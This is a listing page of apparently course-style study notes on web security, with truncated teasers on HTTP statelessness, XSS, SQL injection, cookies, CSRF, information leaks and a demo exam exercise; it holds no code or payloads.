Web security

Web application are built on top of HTTP, which is a stateless protocol that has only weak authentication built in. State and authentication are emulted by the application, they are not embedded in…

Cross site scripting is a vulnerability by means of which client-side code can be injected in a page. For example, suppose we have a blog app which lets user post anything they want. A malicious user…

SQL injection is a web security vulnerability that allows an attacker to interfere with the queries that an application makes to its database. It generally allows an attacker to view data that they…

HTTP is stateless and almost uniderectionl. Web application, on the other hand, need to keep a state. Cookies is a client side information storage, a reliable mechanism to keep stateful information.…

Cross-site request forgery (also known as CSRF) is a web security vulnerability that allows an attacker to induce users to perform actions that they do not intend to perform. It allows an attacker to…

Freudian slips (information leaks) Dettailed error messages Display user-supplied data in errors Side-channels (e.g. "user not found" vs "password mismatch") Debug in production Url parameter…

2021-2022 Demo exam exercise 4 (6 points) LetsComplain is a new website for students and profs. Students here can complain about exams and professors can handle the complaints and register their…